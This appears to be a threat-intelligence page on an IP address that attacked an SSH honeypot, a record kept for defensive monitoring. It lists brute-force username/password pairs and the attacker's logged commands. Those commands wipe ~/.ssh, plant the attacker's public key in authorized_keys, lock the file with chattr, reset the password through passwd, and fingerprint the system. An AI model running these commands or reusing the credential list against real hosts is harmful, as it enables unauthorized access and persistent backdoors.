Active Threat โ€ข HIGH

113.141.171.139

First Detection1/5/2026
Last Activity2/22/2026
ISPCHINANET SHAANXI province Cloud Base network
๐ŸŽฏ
213
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
18
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ณ China
City
Unknown
ASN
AS134768
ISP
CHINANET SHAANXI province Cloud Base network

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”testuser/123
1x
๐Ÿ”bkpuser/bkpuser@123
1x
๐Ÿ”claude/Claude123!
1x
๐Ÿ”user14/123456
1x
๐Ÿ”gabriel/gabriel@123
1x
๐Ÿ”root/Root123123
1x
๐Ÿ”testuser/3245gs5662d34
1x
๐Ÿ”claude/1234
1x
๐Ÿ”zte/zte@123
1x
๐Ÿ”ryan/ryan123
1x
๐Ÿ”345gs5662d34/345gs5662d34
1x

Executed Commands

$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~2x
$lockr -ia .ssh2x
$cd ~; chattr -ia .ssh; lockr -ia .ssh2x
$echo "123456\nk8gUaP8Ryg6G\nk8gUaP8Ryg6G\n"|passwd1x
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'1x
$echo -e "123456\nk8gUaP8Ryg6G\nk8gUaP8Ryg6G"|passwd|bash1x
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'1x
$Enter new UNIX password: 1x
$uname -a1x
$ls -lh $(which ls)1x

Risk Assessment

65
/100
LowMediumHighCritical